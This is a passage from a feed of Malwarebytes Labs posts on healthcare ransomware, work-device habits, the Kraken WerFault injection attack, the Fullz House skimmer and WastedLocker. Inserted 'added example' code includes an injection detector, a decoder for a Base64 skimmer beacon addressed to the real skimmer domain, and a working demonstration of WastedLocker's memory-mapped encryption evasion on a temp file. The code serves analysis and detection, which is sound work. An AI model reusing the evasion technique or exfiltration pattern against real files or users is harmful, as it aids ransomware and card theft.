  • Extra stressors: Additional issues like COVID-19, fires, and other natural disasters can eat into the available time and push aside the need to perform updates, make backups, or think about anything cybersecurity related. These stressors and other reasons are often summed up as “we have more important things to do.”

IoT security risks

Many medical devices that investigate and monitor the patient are connected to the internet. We consider them to be part of the Internet of Things (IoT). This group of devices comes with its own set of security risks, especially when it comes to personally identifiable information (PII).

In every case it is advisable to investigate whether the device’s settings allow it to be reached over the intranet instead of the internet. If possible, that makes it easier to shield the device from unauthorized access and keep the sensitive data inside the security perimeter.

Legacy systems

Medical systems come from various suppliers, and in any hospital you will find many different types, each with its own purpose, user guide, and update regime. For many legacy systems, the acting rule of thumb will be not to tinker with it if it works. The fear of a system failure outweighs the urgency to install the latest patches. We can relate to that state of mind, except when it is applied to security updates on a connected system.

Disaster stress

Okay, here comes our umpteenth mention of COVID-19—I know, but it is a factor that we can’t ignore.

The recent global pandemic contributes to the lack of time that IT staff at many healthcare organizations feel they have. The same is true for many other disasters that require emergency solutions to be set up.

In some cases, entire specialized clinics were built to deal with COVID-19 victims, and to replace lost capacity in other disasters like wildfires and landslides.

More important matters at hand?

It’s difficult to overstate the importance of “triage” in the healthcare system. Healthcare professionals like nurses and doctors likely practice it every day, prioritizing the most critical patient needs on a second-by-second basis.

It should serve as no surprise that triaging has a place in IT administration, too. Healthcare facilities should determine which systems require immediate attention and which systems can wait.

Interestingly, the CISO of the hospital which suffered from the ransomware attack was accused of negligence in some German media. Law enforcement in Germany is moving forward with both trying to identify the individuals behind the ransomware attack, as well as potentially charging them with negligent manslaughter because of the woman’s death.

While we can hardly blame the CISO for the woman’s death, there may come a time when inadequate security and its results may carry punishment for those responsible.

Ransomware in particular

The ransomware at play in the German case was identified as DoppelPaymer and it was determined to be planted inside the organization using the CVE-2019-19781 vulnerability in Citrix VPNs.

In more recent news, we learned that UHS hospitals in the US were hit by Ryuk ransomware.

It’s also important to remember that the costs of a ransomware attack are often underestimated. People tend to look only at the actual ransom amount demanded, but the additional costs are often much higher than that.

It takes many people-hours to restore all the affected systems in an organization and return to a fully operational state. The time to recover will be lower in an organization that comes prepared. Having a restoration plan and adequate backups that are easy to deploy can streamline the process of getting back in business. Another important task is to figure out how it happened and how to plug the hole, so it won’t happen again. Also, a thorough investigation may be necessary to check whether the attacker left any backdoors behind.

There’s a problem for every solution

Security will probably never reach a watertight quality, so besides making our infrastructure, especially the vital parts of it, as secure as possible, we also need to think ahead and make plans to deal with a breach. Whether it’s a data breach or an attack that cripples important parts of our systems, we want to be prepared. Knowing what to do—and in what order—can save a lot of time in disaster recovery. Having the tools and backups at hand is the second step in limiting the damage and helping with a speedy recovery.

To sum it up, you are going to need:

  • Recovery plans for different scenarios: data breaches, ransomware attacks, you name it
  • File backups that are recent and easy to deploy or another type of rollback method
  • Backup systems that can take over when critical systems are crippled
  • Training for those involved, or at least an opportunity to familiarize them with the steps of the recovery plans

And last but not least, don’t forget to focus on prevention. The best thing about a recovery plan is when you never need it.

Stay safe, everyone!

The post Healthcare security update: death by ransomware, what’s next? appeared first on Malwarebytes Labs.


Risky business: survey shows majority of people use work devices for personal use

Malware Bytes Security - Wed, 10/07/2020 - 11:30am

There’s no denying the coronavirus pandemic is having a significant impact on the way we use technology. Some changes feel like a subtle acceleration of behavioral shifts that were already well underway (i.e. more online shopping and more streaming TV/movies).

Other changes are more extreme and we’re only beginning to understand the long-term effects. One of the biggest changes has to do with the way people work. More people are working from home than ever before and many are doing so for the very first time.

Now, combine these newly appointed remote workers with company-owned hardware and things are bound to go wrong. Right?

When it comes to light duty personal tasks like checking email, reading the news, or shopping online, most people who are working from home during the pandemic have no qualms about doing so on a work assigned device. The reason? It’s convenient, it’s believed to be low risk, and, in many cases, it’s allowed. Comparatively, few remote workers avoid any and all personal activities on their work hardware.

These findings and more come out of the latest Malwarebytes Labs reader survey on working from home during the coronavirus pandemic.

Business cybersecurity: perception vs. reality

Before we dig into the results of this new survey, we need to get a little context by looking back at an earlier survey Malwarebytes Labs conducted in August. In this study of the impact of COVID-19 on business cybersecurity, the Labs team spoke with 200 managers, directors, and C-suite executives in IT and cybersecurity roles at companies across the US to determine how their security posture has changed since the start of the pandemic. Sure enough, many companies were caught flatfooted, with 24 percent saying they incurred unexpected expenses relating to a cybersecurity breach or malware attack following shelter-in-place orders. Another 20 percent of respondents said they faced a security breach as a result of a remote worker.

The Labs team wanted to get a better understanding of how and why these security breaches happened. Are remote workers engaging in risky behavior that might open employers up to a potential security breach? To get answers, we went straight to our readers.

We asked Labs readers if they worked from home and, if so, did they have a work device provided by their employer. For the purposes of this survey we defined a work device as a desktop computer, laptop, smartphone, or tablet.

Of the 900 readers who took the survey, 77.5 percent said they currently work from home. About half of at-home workers, 52.7 percent, said they had a work assigned device.

In the earlier study focused on IT leaders, 47 percent said they were confident that their employees were “very aware” of cybersecurity best practices when working from home. Only 17.3 percent believed their employees were “acutely aware and mindful to avoid risk.” A mere 5.4 percent said their employees were “oblivious and risky.” 

The results of the latest reader survey appear to support these assessments. 

When we asked Labs readers if they used a work device to perform personal tasks not relating to work, most people said they felt comfortable performing seemingly low risk everyday tasks. Specifically, 52.6 percent said they sent or received email, while 52 percent said they read the news. Another 37.8 percent said they shopped online, and 25 percent said they checked their social media. 

As for why, most people said it was convenient:

“I’m using the work device during the day, no point starting up my own personal device just to do something I could do on the device I’m already sitting at and using.”

A smaller group of respondents said it was expressly allowed by their employer:

“Work policy allows some personal use outside of work times—read Washington Post, New England Journal of Medicine, Zoom with friends.”

A few said they didn’t have the luxury of switching to a personal computer:

“Kids are using the family computer, I’m already on my work computer.”

For a significant chunk of readers, breaking the monotony of day-to-day WFH life was worth any potential risk. Some 25 percent of respondents said they streamed music, while 24 percent said they streamed videos or movies.

“Easier to stream (within reason) background music and videos while working rather than switch to a dedicated device. Same with reading news and other activities that do not require a personal account sign-in.”

A small, but impressive 30 percent of respondents said they never performed any kind of personal activity on a work assigned device. When asked why, most said something to the effect of “It’s not my computer.”

“I don’t. When I’m tempted to, it’s because it’s easier to not switch to another device or because my work computer has better software than my personal computer. But it’s not my machine so I don’t.”

Others said that personal use was forbidden or outright restricted:

“I work for the government. They monitor computer usage, so no personal stuff done on the work laptop.”

Risky business for remote workers

Remote workers who engaged in online behavior that could be considered high risk were relatively few. Of those surveyed, 22 percent said they downloaded or installed an application on work systems. Another 6.5 percent of respondents said they used a work device as a WiFi hotspot for other devices. Possibly taking advantage of more powerful work hardware, 4.6 percent said they played video games.

It’s worth noting, gamers are a favorite target for cybercriminals. Malwarebytes Labs has reported on cheat tools that contain hidden malware, in-game currency scams, and phishing sites that lure victims in with the promise of “free” games.

Setting boundaries

At this point, you’re probably wondering why there’s no data about how many remote workers used work devices to connect to unsecured public WiFi networks. Varying shelter-in-place restrictions and the closure of many facilities that offer public WiFi (like coffee shops and restaurants) make it nigh impossible to get accurate data on the subject. If anything, we’ll save that question for a future survey.

For now, it’s safe to say most people working from home are doing so safely. However, the onus is on employers to set clear boundaries around what employees can and cannot do with the company hardware.

One survey respondent summed it up best:

“Pure convenience. The work laptop is fully set up with a dock and connections to keyboard, mouse, external monitor, and wired Internet … So, short answer: I’m lazy.”

The same respondent added:

“It’s probably worth noting that the employer has a reasonable set of safeguards on the laptop itself—I could not, for example, randomly download new software, nor visit certain non-safelisted sites.”

If you’re a business owner, short of placing draconian restrictions on what your remote workers can and can’t do with their work devices, now is a good time to remind employees about work device protocols. Finally, we would be remiss without mentioning Malwarebytes offers endpoint protection solutions that keep your employees, devices, and network safe if and when a remote worker clicks a bad link, opens an infected attachment, or visits a malicious website.

The post Risky business: survey shows majority of people use work devices for personal use appeared first on Malwarebytes Labs.


Release the Kraken: Fileless APT attack abuses Windows Error Reporting service

Malware Bytes Security - Tue, 10/06/2020 - 11:00am

This blog post was authored by Hossein Jazi and Jérôme Segura.

On September 17th, we discovered a new attack called Kraken that injected its payload into the Windows Error Reporting (WER) service as a defense evasion mechanism.

That reporting service, WerFault.exe, is usually invoked when an error related to the operating system, Windows features, or applications happens. When victims see WerFault.exe running on their machine, they probably assume that some error happened, while in this case they have actually been targeted in an attack.

While this technique is not new, this campaign is likely the work of an APT group that had earlier used a phishing attack enticing victims with a worker’s compensation claim. The threat actors compromised a website to host their payload and then used the CactusTorch framework to perform a fileless attack followed by several anti-analysis techniques.

At the time of writing, we could not make a clear attribution to who is behind this attack, although some elements remind us of the Vietnamese APT32 group.

Malicious lure: ‘your right to compensation’

On September 17, we found a new attack starting from a zip file containing a malicious document most likely distributed through spear phishing attacks.

The document “Compensation manual.doc” pretends to include information about compensation rights for workers:

Figure 1: Malicious Document

The file contains an image tag (“INCLUDEPICTURE”) that connects to “yourrighttocompensation[.]com” and downloads an image that will be the document template.

Figure 2: Image tag embedded within the document

Figure 3: yourrighttocompensation website

This domain was registered on 2020-06-05 while the document creation time is 2020-06-12, which likely indicates that they are part of the same attack.

Inside, we see a malicious macro that uses a modified version of CactusTorch VBA module to execute its shellcode. CactusTorch is leveraging the DotNetToJscript technique to load a .Net compiled binary into memory and execute it from vbscript.

The following figure shows the macro content used by this threat actor. It has both AutoOpen and AutoClose functions. AutoOpen just shows an error message while AutoClose is the function that performs the main activity.

Figure 4: Macro

As you can see in Figure 4, a serialized object in hex format has been defined which contains a .Net payload that is loaded into memory. Then, the macro defines an entry class with “Kraken.Kraken” as its value. This value has two parts separated by a dot: the name of the .Net loader and its target class name.

In the next step, it creates a serialization BinaryFormatter object and uses the Deserialize function of BinaryFormatter to deserialize the object. Finally, by calling DynamicInvoke the .Net payload is loaded and executed from memory.

Unlike CactusTorch VBA that specifies the target process to inject the payload into it within the macro, this actor changed the macro and specified the target process within the .Net payload.

Kraken Loader

The loaded payload is a .Net DLL with “Kraken.dll” as its internal name, compiled on 2020-06-12.

This DLL is a loader that injects an embedded shellcode into WerFault.exe. To be clear, this is not the first case of such a technique. It was observed before with the NetWire RAT and even the Cerber ransomware.

The loader has two main classes: “Kraken” and “Loader“.

Figure 5: Kraken.dll

The Kraken class contains the shellcode that will be injected into the target process, defined in this class as “WerFault.exe”. It has only one function, which calls the Load function of the Loader class with the shellcode and target process as parameters.

Figure 6: Kraken class

The Loader class is responsible for injecting shellcode into the target process by making Windows API calls.

Figure 7: Load function

These are the steps it uses to perform its process injection:

  • StartProcess function calls the CreateProcess Windows API with 800000C as dwCreationFlags.
  • FindEntry calls ZwQueryInformationProcess to locate the base address of the target process.
  • CreateSection invokes the ZwCreateSection API to create a section within the target process.
  • ZwMapViewOfSection is called to bind the section to the target process in order to copy the shellcode in by invoking CopyShellcode.
  • MapAndStart finishes the process injection by calling WriteProcessMemory and ResumeThread.

ShellCode Analysis

Using HollowsHunter we dumped the shellcode injected into WerFault.exe for further analysis. This DLL performs its malicious activities in multiple threads to make its analysis harder.

This DLL is executed by calling the “DllEntryPoint” that invokes the “Main” function.

Figure 8: Main Process

The main function calls DllMain which creates a thread to perform its functions in a new thread within the context of the same process.

Figure 9: Dll main

The created thread at first performs some anti-analysis checks to make sure it’s not running in an analysis/sandbox environment or in a debugger.

It does this through the following actions:

1) Checks existence of a debugger by calling GetTickCount:

GetTickCount is a timing function that is used to measure the time needed to execute some instruction sets. In this thread, it is being called two times before and after a Sleep instruction and then the difference is being calculated. If it is not equal to 2 the program exits, as it identifies it is being debugged.

Figure 10: Created thread

2) VM detection:

In this function, it checks if it is running in VMware or VirtualBox by extracting the provider name of the display driver registry key (SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000) and then checking if it contains the strings VMware or Oracle.

Figure 11: VM detection

3) IsProcessorFeaturePresent:  

This API call is used to determine whether the specified processor feature is supported or not. As the picture below shows, “0x17” has been passed to this API as a parameter, which means it checks __fastfail support before proceeding with immediate termination.

Figure 12: IsProcessorFeaturePresent

4) NtGlobalFlag:

The shellcode checks NtGlobalFlag in the PEB structure to identify whether it is being debugged or not. To identify the debugger it compares the NtGlobalFlag value with 0x70.

5) IsDebuggerPresent:

This checks for the presence of a debugger by calling “IsDebuggerPresent“.

Figure 13: NtGlobalFlag and IsDebuggerPresent check

Once all these anti-analysis checks pass, it enters a function that builds the final shellcode and runs it in a new thread. The API calls used in this part are obfuscated and resolved dynamically by the "Resolve_Imports" function.

This function obtains a handle to kernel32.dll with LoadLibraryEx and then resolves 12 imports in a loop.

Figure 14: Resolve_Imports

Using the libpeconv library we were able to recover the list of resolved API calls. Here is the list of imports; from it we can already expect some form of process injection.


After resolving the required API calls it allocates a memory region with VirtualAlloc and then calls "DecryptContent_And_WriteToAllocatedMemory" to decrypt the final shellcode and write it into that region.

Next, VirtualProtect is called to change the protection of the allocated region so that it is executable. Finally, CreateThread is called to run the final shellcode in a new thread. Allocating the region writable and only then flipping it to executable avoids the crudest heuristic (a single VirtualAlloc with PAGE_EXECUTE_READWRITE), but the sequence itself, a fresh private allocation reprotected to an executable protection and then used as a thread start address, is a good thing to alert on.

Figure 15: Resolve Imports and Create new thread Final Shell code

The final shellcode is a sequence of instructions that makes an HTTP request to a hard-coded domain, downloads a malicious payload and runs it.

As a first step it loads the WinINet library by calling LoadLibraryA:

Figure 16: Loads Wininet

Then it resolves the functions required to make the HTTP request: InternetOpenA, InternetConnectA, HttpOpenRequestA and InternetSetOptionExA.

Figure 17: HttpOpenRequestA

After preparing everything needed for the request, it creates the HTTP request and sends it by calling HttpSendRequestExA. The requested URL is: [.]net/favicon32.ico

Figure 18: HttpSendRequestExA

Next it checks whether the HTTP request succeeded. If it did not, it calls ExitProcess to terminate.

Figure 19: Checking the http request success

If HttpSendRequestExA returns TRUE, the request succeeded and the code moves on: it calls VirtualAllocEx to allocate a memory region and then InternetReadFile to read the response body into that region.

Figure 20: InternetReadFile call

At the end it jumps to the start of the allocated memory to execute it. This is very likely another shellcode hosted on the compromised "" site and planted there as a fake favicon.

Since the target URL was already down at the time of the report, we were not able to retrieve this shellcode for further analysis.
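Both stages described above, the loader (VirtualAlloc, decrypt, VirtualProtect, CreateThread) and the downloader (VirtualAllocEx, InternetReadFile, jump), leave the same footprint in an API-call trace, which is what a sandbox or API monitor gives you. The detector below is an added example, not code from the post: it replays such a trace per process, tracks private allocations, and flags a region that was allocated non-executable, reprotected to an executable protection and then used as a thread start, as well as network data read into a region that is, or later becomes, executable. The trace schema and the sample events are constructed; the page does not state the protection of the download buffer, so PAGE_EXECUTE_READWRITE is assumed in the sample.

```python
"""
Added example: flag RW->RX->CreateThread and download-into-executable-memory
sequences in an API-call trace. Not code from the Malwarebytes post.
"""
from collections import namedtuple

# Page protection constants from winnt.h.
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
EXEC_MASK = 0xF0  # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY

# One traced call: process id, API name, named arguments, return value.
Event = namedtuple("Event", "pid api args ret")


class Region:
    def __init__(self, base, size, protect):
        self.base, self.size, self.protect = base, size, protect
        self.made_executable = False  # allocated non-X, later VirtualProtect'ed to X
        self.network_filled = False   # InternetReadFile wrote into it

    def contains(self, addr):
        return self.base <= addr < self.base + self.size

    @property
    def executable(self):
        return bool(self.protect & EXEC_MASK)


class InjectionDetector:
    def __init__(self):
        self.regions = {}   # pid -> [Region]
        self.findings = []

    def _region(self, pid, addr):
        return next((r for r in self.regions.get(pid, []) if r.contains(addr)), None)

    def _flag(self, pid, msg):
        self.findings.append(f"pid {pid}: {msg}")

    def feed(self, ev):
        if ev.api in ("VirtualAlloc", "VirtualAllocEx"):
            self.regions.setdefault(ev.pid, []).append(
                Region(ev.ret, ev.args["size"], ev.args["protect"]))
        elif ev.api == "VirtualProtect":
            r = self._region(ev.pid, ev.args["address"])
            if r and not r.executable and ev.args["new_protect"] & EXEC_MASK:
                r.made_executable = True
                r.protect = ev.args["new_protect"]
                if r.network_filled:
                    self._flag(ev.pid, f"network-filled region {r.base:#x} made executable")
        elif ev.api == "CreateThread":
            r = self._region(ev.pid, ev.args["start"])
            if r and r.made_executable:
                self._flag(ev.pid, f"thread started in RW->RX region {r.base:#x}")
        elif ev.api == "InternetReadFile":
            r = self._region(ev.pid, ev.args["buffer"])
            if r:
                r.network_filled = True
                if r.executable:
                    self._flag(ev.pid, f"InternetReadFile into executable region {r.base:#x}")
        # any other API in the trace is simply ignored


def scan(events):
    """Replay a trace and return the list of findings, in order."""
    det = InjectionDetector()
    for ev in events:
        det.feed(ev)
    return det.findings


def sample_trace():
    """Constructed trace mirroring the two stages analysed in the post."""
    pid = 4321
    return [
        Event(pid, "VirtualAlloc", {"size": 0x3000, "protect": PAGE_READWRITE}, 0x1E0000),
        # decryption into the buffer happens here, no API call to see
        Event(pid, "VirtualProtect", {"address": 0x1E0000, "size": 0x3000,
                                      "new_protect": PAGE_EXECUTE_READ}, 1),
        Event(pid, "CreateThread", {"start": 0x1E0000}, 0x2C4),
        Event(pid, "LoadLibraryA", {"name": "wininet.dll"}, 0x76E00000),
        # RWX assumed for the download buffer; the post does not state it
        Event(pid, "VirtualAllocEx", {"size": 0x10000, "protect": PAGE_EXECUTE_READWRITE}, 0x2F0000),
        Event(pid, "InternetReadFile", {"buffer": 0x2F0000, "size": 0x10000}, 1),
    ]


if __name__ == "__main__":
    for line in scan(sample_trace()):
        print(line)
```

A region that is allocated executable and filled by InternetReadFile, or filled first and reprotected later, is flagged either way; a RW allocation that is reprotected to read-only, or a thread started in a module's own code, produces nothing.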

The work of an APT, but which one?

We do not have enough evidence to attribute this attack. However, we have found some loose connections to APT32 and are still investigating them:

  • APT32 is one of the actors known to use CactusTorch HTA to drop variants of the Denis RAT. However, since we were not able to get the final payload, we cannot definitively attribute this attack to APT32.
  • The domain used to host the malicious archives and documents is registered in Ho Chi Minh City, Vietnam. APT32 has used strategic web compromises to target victims and is believed to be Vietnam-based.

Malwarebytes blocks access to the compromised site hosting the payload:

Figure 21: Lure document attempting to contact the remote site

IOCs

Lure document: 31368f805417eb7c7c905d0ed729eb1bb0fea33f6e358f7a11988a0d2366e942

Archive file containing lure document:

Document template image:

Archive file download URLs:

Download URL for final payload:

The post Release the Kraken: Fileless APT attack abuses Windows Error Reporting service appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Mobile network operator falls into the hands of Fullz House criminal group

Malware Bytes Security - Mon, 10/05/2020 - 4:49pm

Most victims of Magecart-style attacks are typical online shops selling various goods. Every now and again, though, we come across a different kind of business that was affected simply because it happened to be vulnerable.

Today we take a quick look at a mobile operator that sells cell phone plans to its customers. Its website lets you shop for devices and service through the familiar shopping cart experience.

Criminals linked to the Fullz House group, previously documented for their phishing prowess, managed to inject malicious code into that platform and capture data from unsuspecting online shoppers.

Unusual victim

Boom! Mobile is a wireless provider that sells mobile phone plans that operate on the big networks. The Oklahoma-based business advertises great customer service, transparency, and no contracts.

Our crawlers recently detected that their website, boom[.]us, had been injected with a one-liner containing a Base64-encoded URL that loads an external JavaScript file.

Once decoded, the URL points to a fake Google Analytics script at paypal-debit[.]com/cdn/ga.js. We quickly recognized this code as a credit card skimmer: it watches for input fields and exfiltrates their contents to the criminals.

This skimmer is quite noisy, as it exfiltrates data every time it detects a change in the fields on the current page. On the wire, each leak shows up as a single GET request whose data is Base64 encoded.
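Two triage helpers for the injection and the beacons described above, added here as an example (not code from the post or from the skimmer): the first pulls Base64-encoded script URLs out of an `atob(...)` one-liner in page HTML, the second decodes the Base64 query values of a beacon GET so you can see which form fields leaked. The HTML snippet, the beacon path and parameter name, and the card data are constructed for this example; the skimmer domain is the one named in the post. The decoder is more general than the case in the text: it accepts standard and URL-safe Base64, missing padding, and JSON or plain-text payloads.

```python
"""
Added example: decode a Base64 atob() loader and a Base64 exfil beacon.
Not code from the Malwarebytes post or from the skimmer itself.
"""
import base64
import binascii
import json
import re
from urllib.parse import parse_qsl, quote, urlsplit

ATOB_RE = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=_-]+)["']\s*\)""")

SKIMMER_SCRIPT_URL = "https://paypal-debit.com/cdn/ga.js"  # domain from the post

# Constructed stand-in for the injected one-liner: the script URL only
# appears in the DOM after atob() runs, so a plain string grep misses it.
INJECTED_SNIPPET = (
    '<script>var s=document.createElement("script");s.src=atob("'
    + base64.b64encode(SKIMMER_SCRIPT_URL.encode()).decode()
    + '");document.head.appendChild(s);</script>'
)

# Constructed beacon: skimmed fields JSON-encoded, Base64'd, sent as one GET.
# Path, parameter name and card data are made up; 4111... is a test number.
SKIMMED_FIELDS = {"cc": "4111111111111111", "exp": "12/24", "cvv": "123", "name": "Jane Doe"}
SAMPLE_BEACON = ("https://paypal-debit.com/cdn/collect?d="
                 + quote(base64.b64encode(json.dumps(SKIMMED_FIELDS).encode()).decode()))


def b64decode_loose(value):
    """Decode standard or URL-safe Base64, tolerating missing padding and a '+'
    that query parsing turned into a space. Returns None if it is not Base64."""
    s = value.strip().replace(" ", "+").replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def find_encoded_script_urls(html):
    """Return the URLs hidden inside atob("...") calls on a page."""
    found = []
    for encoded in ATOB_RE.findall(html):
        raw = b64decode_loose(encoded)
        if raw is None:
            continue
        text = raw.decode("utf-8", errors="replace")
        if text.startswith(("http://", "https://", "//")):
            found.append(text)
    return found


def decode_exfil_request(url):
    """Decode every Base64-looking query value of a beacon URL; JSON is parsed."""
    decoded = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        raw = b64decode_loose(value)
        if raw is None:
            continue
        try:
            decoded[key] = json.loads(raw)
        except ValueError:
            decoded[key] = raw.decode("utf-8", errors="replace")
    return decoded


def defang(url):
    """Make a URL safe to paste into a report: paypal-debit.com -> paypal-debit[.]com."""
    host = urlsplit(url).hostname or ""
    return url.replace(host, host.replace(".", "[.]"), 1)


if __name__ == "__main__":
    for script_url in find_encoded_script_urls(INJECTED_SNIPPET):
        print("loader pulls:", defang(script_url))
    print("beacon leaks:", decode_exfil_request(SAMPLE_BEACON))
```

Point decode_exfil_request at the request targets from a proxy or web-server log filtered on the skimmer host to reconstruct exactly which fields were sent; because the skimmer fires on every field change, expect many partial beacons per victim.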

Known threat actor

We recognized this domain and code from a previous incident in which the threat actors were using decoy payment portals set up like phishing pages.

RiskIQ tracks this group under the nickname "Fullz House" because of its use of carding sites to resell "fullz," criminal slang for complete packages of a victim's personal and payment data.

In late September, we noticed a number of newly registered domains following the same pattern we had seen before with this group.

The group was quite active over the summer and continues a well-established pattern first seen a year ago. Those domains sit on AS 45102 (Alibaba (US) Technology Co., Ltd.), as previously documented by Sucuri.

Website compromise

According to Sucuri, boom[.]us is running PHP 5.6.40, a branch that has been out of support since January 2019. This may have been the point of entry, but any other vulnerable plugin could equally have been abused by the attackers to inject malicious code into the website.

We reported this incident to Boom! Mobile both via live chat and by email but had not heard back from them at the time of writing. Their website is still compromised and online shoppers are still at risk.

Malwarebytes Browser Guard was already blocking the skimmer domain before we detected this incident, preventing the remote script from loading its malicious code.

Thanks to @AffableKraut and @unmaskparasites for sharing additional IOCs.

Indicators of Compromise

Skimmer domains


Skimmer IPs

Registrant email

The post Mobile network operator falls into the hands of Fullz House criminal group appeared first on Malwarebytes Labs.


A week in security (September 28 – October 4)

Malware Bytes Security - Mon, 10/05/2020 - 1:00pm

Last week on Malwarebytes Labs, we dug into what happens when card fraud comes calling, gave a rundown of some novel ransomware attacks that took advantage of smart coffee makers, and introduced VideoBytes, our new monthly series of video coverage of the cybersecurity world's top stories. In our first week, we gave viewers a look at both the infamous Twitter hack and the evolution of ransomware.

Finally, we published our latest episode of Lock and Code, in which we spoke with Open Path co-founder and chief security officer Samy Kamkar about the digital vulnerabilities in our physical world.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (September 28 – October 4) appeared first on Malwarebytes Labs.


VideoBytes: Ransomware gets wasted!

Malware Bytes Security - Fri, 10/02/2020 - 1:00pm

Hello dear readers, and welcome to the latest edition of VideoBytes! On today's episode, we're talking about how ransomware is on the rise again, focused on attacking corporations with malware that not only encrypts files but also steals them.

The tactics used to deploy these forms of ransomware have become more capable, and the effort that goes into an attack is far greater than what we saw three years ago. Ransomware is also evolving, as we continuously see new tactics to evade detection and/or increase infection and encryption speed.

Watch on to learn all about it. Or, as our esteemed host always says: Sit back, relax, here come the facts.

A rise in ransomware attacks

A recent study found that 25% of all UK universities have experienced a ransomware attack in the last 10 years, including Sheffield Hallam University, which had 42 attacks in the past seven years!

Most of the universities covered in the study had been attacked multiple times. However, of the universities that responded, many reported that they did not pay the ransom, rather they restored from backups.

One point made by Ionut Ilascu from Bleeping Computer mentions that “the results from the FOIA are a poor reflection of the recent period as close to half of all the schools receiving the solicitation refused to give any information, motivating with concerns that admission of attack would only encourage the hackers.”

Logic dictates that going after a previous cybercrime victim is like trying to launch a sneak attack on an enemy who already knows you are coming. Clearly, some folks believe that admitting you have been the victim of a cyber-attack is a sign of weakness or insecurity.

Attackers threaten to report you!

There are possible legal difficulties that may affect whether or not a company pays or even reports a ransomware attack. For example, the General Data Protection Regulation, or GDPR, is a sweeping data privacy and protection law in the European Union that attempts to enforce the safe and secure protection of user data by organizations operating in Europe. 

Admitting that an attack occurred and inviting possible investigation into how secure, or insecure, your data storage policies are may be enough reason for some organizations to downplay attacks. In fact, a ransomware group has recently taken advantage of this and is using GDPR threats to try and extort victims.

For example, servers running the MongoDB database software are being targeted by attackers who are focused on insecure deployments of the software, with the goal of accessing databases, stealing data and replacing it with README files that demand bitcoin payments in 48 hours or else all stolen data will get released online.

Part of the ransom note claims that if the victim doesn’t pay, not only will they release the files, but they will also report the organization to the GDPR authorities, which may lead to a fine or arrest (according to the note, anyway, which is clearly meant to drum up fear).

Victor Gevers of the GDI Foundation, who has been tracking this threat, identified over 15,000 servers that the README ransom note was found on. He obtained this information after querying the internet device search engine Shodan. However, other scanners show up to 23,000 affected servers.

According to a Bleeping Computer article by Lawrence Abrams, which featured Victor Gevers: “With the ransom amount being small at $135.55 and the worry of GDPR violations, Gevers feels that it may cause some people to pay. The actors then know that the data is valuable to the owner and extort them for even more money.”

WastedLocker ransomware lands a whale

That $135 ransom is a lot less than Garmin reportedly paid when it suffered an attack from a ransomware known as WastedLocker, which knocked down a lot of their services in the process. According to media reports, Garmin ended up using a ransomware negotiation company called Arete IR to pay millions of dollars to the attackers and get everything back up and running again.

WastedLocker is a ransomware tool known to be associated with the Russian cybercrime gang "Evil Corp", and it has been on a bit of a spree over the last few months. And you're right, it's not the most inventive name for a cybercriminal gang.

Fake news?

In July it was reported that this same ransomware strain was found infecting networks of dozens of US newspaper websites. They hosted WastedLocker executables on those infected servers and, when needed, would download it from the same sites. The goal was to mask the malicious intent of the traffic by making it look like a user just reading the news.

In addition, Symantec warned folks about this group a month before the Garmin attack was made public. These guys are not messing around; they only seem to go after well-resourced and likely well-researched organizations, unlike other ransomware families we have seen in the past who target anyone willing to run their malware.

Evading protection

An example of this group's sophistication is their use of new features meant to evade detection by anti-ransomware tools. Many of these tools look for an untrusted executable doing ransomware-like things, for example encrypting files and deleting the originals, to identify a possible ransomware infection.

WastedLocker instead works through the Windows Cache Manager, which holds in-memory copies of file data. The malware reads the contents of a victim file into the cache, then encrypts the cached data rather than the file on disk.

When enough of the cached data has been "modified" (encrypted) by the ransomware, the cache manager writes the modified data back to the original file on its own. In simple terms, the unencrypted file is replaced with the encrypted version, and the write happens under the umbrella of a legitimate system process rather than some shady EXE.

The idea is that if an anti-ransomware tool does not see the malware binary doing the writing, maybe it will not detect the malware. Vendors are already updating their tools to catch this behavior, so it may not be a clever trick for much longer.
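The write path described above, reproduced as an added example on a throwaway file with a toy single-byte XOR standing in for the real cipher; this is not WastedLocker code. The process never calls write(): it maps the file, modifies the mapped pages and lets the operating system flush the dirty pages back. Python's mmap is a CreateFileMapping/MapViewOfFile section on Windows, which is the cache-manager path the post describes, and mmap(2) on POSIX, where the page cache plays the same role, so the same script shows the effect on either platform. The file content and key are constructed.

```python
"""
Added example: modify a file through a shared memory mapping so that no
write() call is ever issued by this process. Toy XOR, not a real cipher.
"""
import mmap
import os
import tempfile

TOY_KEY = 0x5A  # constructed; a real sample uses a proper cipher and per-file keys


def encrypt_in_mapping(path, key=TOY_KEY):
    """XOR the file's contents through a writable shared mapping and return its size.
    The only modifications happen to the cached pages; the kernel writes them back."""
    size = os.path.getsize(path)
    with open(path, "r+b") as fh:
        with mmap.mmap(fh.fileno(), size) as view:     # shared, read/write view
            view[:] = bytes(b ^ key for b in view[:])  # touch the mapped pages only
            view.flush()                               # msync / FlushViewOfFile
    return size


def demo(content=b"Quarterly figures, do not distribute.\n"):
    """Create a temp file, run the mapping trick on it, return what is now on disk."""
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(content)          # the only explicit write: the original data
        encrypt_in_mapping(path)
        with open(path, "rb") as fh:
            on_disk = fh.read()
    finally:
        os.unlink(path)
    return on_disk


def expected_ciphertext(content, key=TOY_KEY):
    """What the file should contain after one pass (XOR is its own inverse)."""
    return bytes(b ^ key for b in content)


if __name__ == "__main__":
    original = b"Quarterly figures, do not distribute.\n"
    print("file changed without write():", demo(original) == expected_ciphertext(original))
```

For detection this means a hook on WriteFile/NtWriteFile in the suspect process sees nothing; the signals that survive are the section being created and mapped with write access over user documents (NtCreateSection/NtMapViewOfSection on a Windows trace), the sheer number of files touched, and whatever rename or marker-file behavior follows.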

The new normal for ransomware

Researchers believe that WastedLocker is manually operated by attackers who use things like stolen passwords and exposed, vulnerable network services not just to launch malware but to scope out a target and decide on the best strategy for the attack. Something like that is more difficult to predict and defend against, especially when the actor has proven to be sophisticated and clever.

